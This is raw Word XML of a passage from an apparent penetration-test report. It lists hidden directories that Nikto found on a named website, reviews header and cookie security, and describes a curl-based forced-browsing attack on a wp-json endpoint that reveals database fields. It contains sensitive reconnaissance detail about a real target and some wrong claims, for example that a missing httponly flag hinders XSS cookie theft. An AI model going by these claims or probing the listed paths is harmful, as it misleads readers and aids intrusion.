    <w:p w14:paraId="77233B85" w14:textId="057E77C5" w:rsidR="00876359" w:rsidRDefault="00876359" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>It also revealed that the SSL/TLS encryption being utilised is AES-256 and SHA-384 which is military grade encryption, although from previous research, if the webserver has not been configured correctly, the webserver could be vulnerable to the Heartbleed and/or POODLE vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C2C44" w14:textId="320DA447" w:rsidR="00DD2481" w:rsidRDefault="00876359" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hidden directories have been found by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD2481">
        <w:t xml:space="preserve">that can be </w:t>
      </w:r>
      <w:r w:rsidR="00A00D89">
        <w:t>further investigated using the Linux Curl utility</w:t>
      </w:r>
      <w:r w:rsidR="00DD2481">
        <w:t xml:space="preserve"> if the webserver has not secured </w:t>
      </w:r>
      <w:r w:rsidR="00A00D89">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00DD2481">
        <w:t>hidden directories</w:t>
      </w:r>
      <w:r w:rsidR="00A00D89">
        <w:t xml:space="preserve"> correctly</w:t>
      </w:r>
      <w:r w:rsidR="00DD2481">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC57025" w14:textId="3A5D06AE" w:rsidR="00876359" w:rsidRDefault="00DD2481" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The hidden directories and files found are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F483A" w14:textId="785C4624" w:rsidR="00DD2481" w:rsidRDefault="00DD2481" w:rsidP="00876359">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/webmail/blank.html    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>securecontrolpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37716F12" w14:textId="5F756563" w:rsidR="00DD2481" w:rsidRDefault="00DD2481" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>. /mailman/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/            </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. /Sitemap/xml                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/robots.txt                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>. /server-status/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFFE78" w14:textId="18A491DA" w:rsidR="00DD2481" w:rsidRDefault="00DD2481" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-sys/     </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>. /webmail/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>emailreader_execute_on_each_page.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B577AE5" w14:textId="2B270E71" w:rsidR="00DD2481" w:rsidRDefault="00DD2481" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>. /webmail/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>read_body.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>. /licence.txt</w:t>
      </w:r>
      <w:r w:rsidR="00A00D89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00776A54">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00776A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r w:rsidR="00776A54">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00776A54">
        <w:t>controlpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00776A54">
        <w:t xml:space="preserve">/    </w:t>
      </w:r>
      <w:r w:rsidR="00776A54" w:rsidRPr="00776A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
      <w:r w:rsidR="00776A54">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00776A54">
        <w:t>cpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00776A54">
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidR="00776A54" w:rsidRPr="00776A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00776A54">
        <w:t>./webmail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1461DDFE" w14:textId="6715BC46" w:rsidR="00776A54" w:rsidRDefault="00776A54" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Xframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security has been found within the website header: </w:t>
      </w:r>
      <w:r w:rsidRPr="00776A54">
        <w:t>x-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00776A54">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00776A54">
        <w:t>-protection found mode=block</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00776A54">
        <w:t>x-frame-options found contents: SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00776A54">
        <w:t xml:space="preserve">x-content-type-option contents: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00776A54">
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47E4A478" w14:textId="465CD7F4" w:rsidR="0070430C" w:rsidRDefault="009B051D" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Website cookie security has also been found within the website PHP coding: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B051D">
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B051D">
        <w:t>phpsessid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B051D">
        <w:t xml:space="preserve"> created without the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B051D">
        <w:t>httponly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B051D">
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which makes client side cookie hijacking </w:t>
      </w:r>
      <w:r w:rsidR="0006069D">
        <w:t xml:space="preserve">very </w:t>
      </w:r>
      <w:r>
        <w:t>difficult utilising an XSS attack</w:t>
      </w:r>
      <w:r w:rsidR="0006069D">
        <w:t xml:space="preserve"> because this flag tells the website browser that the server can only read the cookies and not the client side website browser connected to the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53936A3C" w14:textId="1EE814FD" w:rsidR="008C5117" w:rsidRDefault="00E95058" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A potential </w:t>
      </w:r>
      <w:r w:rsidR="0070430C">
        <w:t xml:space="preserve">Website Application Firewall, load balancer or proxy server has been highlighted by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0070430C">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0070430C">
        <w:t xml:space="preserve"> because the server changed from Apache to Nginx </w:t>
      </w:r>
      <w:r w:rsidR="00D53CDB">
        <w:t xml:space="preserve">v1.17.6 </w:t>
      </w:r>
      <w:r w:rsidR="0070430C">
        <w:t xml:space="preserve">which is another lightweight Linux webserver. This </w:t>
      </w:r>
      <w:r w:rsidR="00D53CDB">
        <w:t xml:space="preserve">information </w:t>
      </w:r>
      <w:r w:rsidR="0070430C">
        <w:t xml:space="preserve">indicates to the security researcher that this is most probably a load balancer due to the nature of the hosting within a large CSP to handle high volumes of traffic within the datacentre </w:t>
      </w:r>
      <w:r w:rsidR="0086365F">
        <w:t>architecture design configuration.</w:t>
      </w:r>
      <w:r w:rsidR="00C81D55">
        <w:t xml:space="preserve"> Although </w:t>
      </w:r>
      <w:r w:rsidR="008C5117">
        <w:t xml:space="preserve">a section of the website has been found that does not </w:t>
      </w:r>
      <w:r w:rsidR="00B749A7">
        <w:t>employ</w:t>
      </w:r>
      <w:r w:rsidR="008C5117">
        <w:t xml:space="preserve"> the php secure flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA15BC2" w14:textId="06A5E631" w:rsidR="00E95058" w:rsidRPr="00776A54" w:rsidRDefault="008C5117" w:rsidP="00876359">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Due to the output from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> within the found hidden directories the researcher has deduced this unsecure page is within the previously found hidden </w:t>
      </w:r>
      <w:r w:rsidR="00B749A7">
        <w:t>directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that contained a PHP file which was: /webmail/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>emailreader_execute_on_each_page.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this page could potentially be vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CSS exploit. This theory will be employed within the exploitation stage of the penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C413F" w14:textId="05FD76F5" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc40134046"/>
      <w:r>
        <w:t>6.1.</w:t>
      </w:r>
      <w:r w:rsidR="005F7A64">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF7322">
        <w:t>Summary of Section</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="04CCCA54" w14:textId="3827FF3C" w:rsidR="00621856" w:rsidRPr="00621856" w:rsidRDefault="00FF7322" w:rsidP="00FF7322">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilising the identified vulnerable ports and configuration errors within the target website. A series of exploits will be leveraged against the possible vulnerabilities to gain unorthodox access to the website target by circumventing the application security that has been put in place. The primary goal will be to exploit information contained within the backend database and the secondary goal will be to exploit the front end of the website if time permits as discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF7322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Framework; Threat </w:t>
      </w:r>
      <w:r w:rsidR="00A953DC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF7322">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">odelling </w:t>
      </w:r>
      <w:r>
        <w:t>section of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EF8CE3" w14:textId="77777777" w:rsidR="00621856" w:rsidRPr="000E3B00" w:rsidRDefault="00621856" w:rsidP="00621856">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Curl, and NMAP, Hidden directories found and vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B11E6" w14:textId="3DD6709B" w:rsidR="005F7A64" w:rsidRPr="005F7A64" w:rsidRDefault="00586631" w:rsidP="005F7A64">
      <w:r>
        <w:t>Web Application Firewall (WAF) detected after scan suggesting HTTTP firewall is on place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793FD5F2" w14:textId="66AAC6FE" w:rsidR="00587262" w:rsidRDefault="0090297E" w:rsidP="00587262">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc40134047"/>
      <w:r>
        <w:t>6.2 Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="40A0F290" w14:textId="74ECE59C" w:rsidR="00A953DC" w:rsidRPr="00A953DC" w:rsidRDefault="00A953DC" w:rsidP="002E4B92">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exploitation tools previously </w:t>
      </w:r>
      <w:r w:rsidR="003F501F">
        <w:t xml:space="preserve">discussed within the </w:t>
      </w:r>
      <w:r w:rsidR="003F501F" w:rsidRPr="003F501F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Penetration Testing Tools</w:t>
      </w:r>
      <w:r w:rsidR="003F501F">
        <w:t xml:space="preserve"> section of this report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be leveraged against the target</w:t>
      </w:r>
      <w:r w:rsidR="003F501F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> along with manual methods to </w:t>
      </w:r>
      <w:r w:rsidR="002E4B92">
        <w:t>attempt to access privileged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> information pertaining to the target</w:t>
      </w:r>
      <w:r w:rsidR="000F03A3">
        <w:t xml:space="preserve"> along with </w:t>
      </w:r>
      <w:r w:rsidR="002E4B92">
        <w:t xml:space="preserve">a possible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4141" w14:textId="66E33904" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc40134048"/>
      <w:r>
        <w:t xml:space="preserve">6.2.1 Attack 1 </w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF1EF0">
        <w:t>Forced Browsing Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00FF1EF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D4A1E" w14:textId="7335B574" w:rsidR="00E113EF" w:rsidRDefault="00E113EF" w:rsidP="00FF1EF0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Utilising the Curl Linux CLI tool</w:t>
      </w:r>
      <w:r w:rsidR="0035159E">
        <w:t xml:space="preserve"> with the syntax [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0035159E">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0035159E">
        <w:t xml:space="preserve"> curl -I </w:t>
      </w:r>
      <w:r w:rsidR="0035159E" w:rsidRPr="0035159E">
        <w:t>www.tevelcyber.com/.../...*Hidden</w:t>
      </w:r>
      <w:r w:rsidR="0035159E">
        <w:t xml:space="preserve"> directories] previously identified within the information gathering stage of the test</w:t>
      </w:r>
      <w:r w:rsidR="00FF1EF0">
        <w:t xml:space="preserve">, this </w:t>
      </w:r>
      <w:r w:rsidR="00502A33">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="008707AE">
        <w:t xml:space="preserve"> will be utilised to leverage a ‘forced </w:t>
      </w:r>
      <w:r w:rsidR="00FF1EF0">
        <w:t>browsing</w:t>
      </w:r>
      <w:r w:rsidR="008707AE">
        <w:t xml:space="preserve"> attack’</w:t>
      </w:r>
      <w:r w:rsidR="007F4379">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4379">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B0288">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://owasp.org/www-community/attacks/Forced_browsing","abstract":"forced browsing","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"OWASP","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"OWASP","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Forced Browsing Software Attack | OWASP Foundation","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=425655f4-7a2d-3c08-9c7f-9a27ffb2c1d9"]}],"mendeley":{"formattedCitation":"[116]","plainTextFormattedCitation":"[116]","previouslyFormattedCitation":"[116]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="007F4379">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F4379" w:rsidRPr="007F4379">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[116]</w:t>
      </w:r>
      <w:r w:rsidR="007F4379">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0004714F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008707AE">
        <w:t xml:space="preserve"> against the hidden </w:t>
      </w:r>
      <w:r w:rsidR="00FF1EF0">
        <w:t>directories</w:t>
      </w:r>
      <w:r w:rsidR="008707AE">
        <w:t xml:space="preserve"> found, this attack is the most common ‘Black Box’ website hacking </w:t>
      </w:r>
      <w:r w:rsidR="00FF1EF0">
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidR="0035159E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00476513">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB51A34" w14:textId="77777777" w:rsidR="006B0B09" w:rsidRDefault="00A43CED" w:rsidP="006B0B09">
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hidden Directory 1:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006B0B09" w:rsidRPr="006B0B09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E7A08D" w14:textId="22E4E375" w:rsidR="00C37364" w:rsidRDefault="006B0B09" w:rsidP="00C37364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following information was retrieved from within the target website hidden directories source code shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00A71BAB" w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">revealed information about the backend </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the commands to enter into the API from the front end of the website to the backend </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which are; POST, PUT, PATCH, DELETE</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that excepts </w:t>
      </w:r>
      <w:r w:rsidR="00610023" w:rsidRPr="00610023">
        <w:t xml:space="preserve">Comma-separated values </w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve">(CSV) lists utilised by backend databases to store information. The backend </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> can be mapped from the addi</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve">onal </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> ‘field’ information retrieved such as: email, last name, first name, Identification (ID), Role (User </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">i.e. administrator, general user etc), slug ( relationship database primary key </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t>identifier</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve">), password, nickname. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA0020" w14:textId="697FE45A" w:rsidR="00A43CED" w:rsidRDefault="00C37364" w:rsidP="00C37364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Utilising</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> this </w:t>
      </w:r>
      <w:r>
        <w:t>information,</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> a SQLi could be performed to</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve"> download, </w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r w:rsidR="00610023">
        <w:t xml:space="preserve">, modify or delete information within the backend </w:t>
      </w:r>
      <w:r>
        <w:t>database. With accordance with the pre-engagement interaction with the client in which they specifically outlined not to download, upload, modify, view, or delete any information within the backend database, the SQLi attack will not be performed against the targets backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDE5CEC" w14:textId="77777777" w:rsidR="00A71BAB" w:rsidRDefault="00A43CED" w:rsidP="00A71BAB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="614E9700" wp14:editId="4C064F19">
            <wp:extent cx="5643880" cy="3078480"/>
            <wp:effectExtent l="19050" t="19050" r="1397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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="15481" r="1507"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5643880" cy="307848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DA8FE45" w14:textId="3A7DA76D" w:rsidR="00A43CED" w:rsidRPr="00A71BAB" w:rsidRDefault="00A71BAB" w:rsidP="00A71BAB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
